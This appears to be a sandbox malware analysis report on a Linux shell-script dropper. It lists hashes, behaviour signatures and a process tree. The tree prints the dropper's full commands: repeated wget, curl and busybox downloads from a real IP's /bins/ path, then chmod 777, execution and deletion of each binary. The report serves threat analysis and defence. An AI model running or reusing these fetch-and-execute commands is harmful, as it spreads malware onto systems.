Analysis
-
max time kernel
34s -
max time network
132s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/11/2024, 03:07
Static task
static1
Behavioral task
behavioral1
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
-
Size
10KB
-
MD5
00e6a838ebbbb8d44e8bde3072d71948
-
SHA1
18ba68e4dc8af71f08dc42dc68055a295059cee5
-
SHA256
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be
-
SHA512
a8395ad7797c42c32a6f073151b82aea873fa6c842131b0899ee95e667e0038619feddfc236a5b12c834fb6a032f31a0cd79e3f931da05269dda866616ebdc14
-
SSDEEP
192:uTWqEbzElT+8s8V5fmlJRGmGxFNCiOn8s8V5alJRGm6xFNCi/WqEbzcq:unT+8s8V5fmlJRGmrn8s8V5alJRGmf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1586 chmod 1622 chmod 1642 chmod 1532 chmod 1666 chmod 1508 chmod 1562 chmod 1574 chmod 1580 chmod 1628 chmod 1550 chmod 1604 chmod 1648 chmod 1544 chmod 1514 chmod 1526 chmod 1592 chmod 1610 chmod 1634 chmod 1654 chmod 1501 chmod 1568 chmod 1598 chmod 1616 chmod 1556 chmod 1538 chmod 1660 chmod 1520 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN 1502 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T 1509 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK 1515 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM 1521 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk 1527 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu 1533 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL 1539 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD 1545 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV 1551 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD 1557 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 1563 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 1569 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik 1575 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt 1581 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu 1587 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL 1593 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD 1599 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV 1605 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD 1611 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 1617 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 1623 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik 1629 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt 1635 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN 1643 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T 1649 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK 1655 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM 1661 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk 1667 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1563 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 1613 wget 1614 curl 1615 busybox 1617 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP 1618 rm 1559 wget 1560 curl 1561 busybox 1564 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP curl File opened for modification /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL curl File opened for modification /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN curl File opened for modification /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK curl File opened for modification /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk curl File opened for modification /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk curl File opened for modification /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD curl File opened for modification /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik curl File opened for modification /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD curl File opened for modification /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM curl File opened for modification /tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL curl File opened for modification /tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD curl File opened for modification /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T curl File opened for modification /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T curl File opened for modification /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu curl File opened for modification /tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD curl File opened for modification /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV curl File opened for modification /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM curl File opened for modification /tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu curl File opened for modification /tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV curl File opened for modification /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 curl File opened for modification /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK curl File opened for modification /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt curl File opened for modification /tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP curl File opened for modification /tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik curl File opened for modification /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN curl File opened for modification /tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1 curl File opened for modification /tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt curl
Processes
-
/tmp/e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh/tmp/e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh1⤵PID:1484
-
/bin/rm/bin/rm bins.sh2⤵PID:1485
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1486
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Writes file to tmp directory
PID:1493
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1500
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:1501
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:1502
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:1503
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1504
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Writes file to tmp directory
PID:1505
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1506
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:1508
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:1509
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:1510
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1511
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1513
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:1516
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1519
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:1522
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1525
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:1528
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1531
-
-
/bin/chmodchmod 777 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu./y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1534
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1537
-
-
/bin/chmodchmod 777 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL./hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1540
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1543
-
-
/bin/chmodchmod 777 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD./RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1546
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1549
-
-
/bin/chmodchmod 777 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV./OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1552
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1553
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1555
-
-
/bin/chmodchmod 777 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD./TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1558
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1559
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1561
-
-
/bin/chmodchmod 777 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP./YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1563
-
-
/bin/rmrm YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1564
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1565
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1567
-
-
/bin/chmodchmod 777 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1./JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1570
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1573
-
-
/bin/chmodchmod 777 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik./Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1576
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1579
-
-
/bin/chmodchmod 777 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt./BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:1582
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1583
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1585
-
-
/bin/chmodchmod 777 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu./y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:1588
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1591
-
-
/bin/chmodchmod 777 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL./hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:1594
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1597
-
-
/bin/chmodchmod 777 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD./RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:1600
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1603
-
-
/bin/chmodchmod 777 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV./OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:1606
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1609
-
-
/bin/chmodchmod 777 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD./TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:1612
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1613
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1615
-
-
/bin/chmodchmod 777 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP./YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1617
-
-
/bin/rmrm YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:1618
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1619
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1621
-
-
/bin/chmodchmod 777 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1./JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:1624
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Writes file to tmp directory
PID:1626
-
-
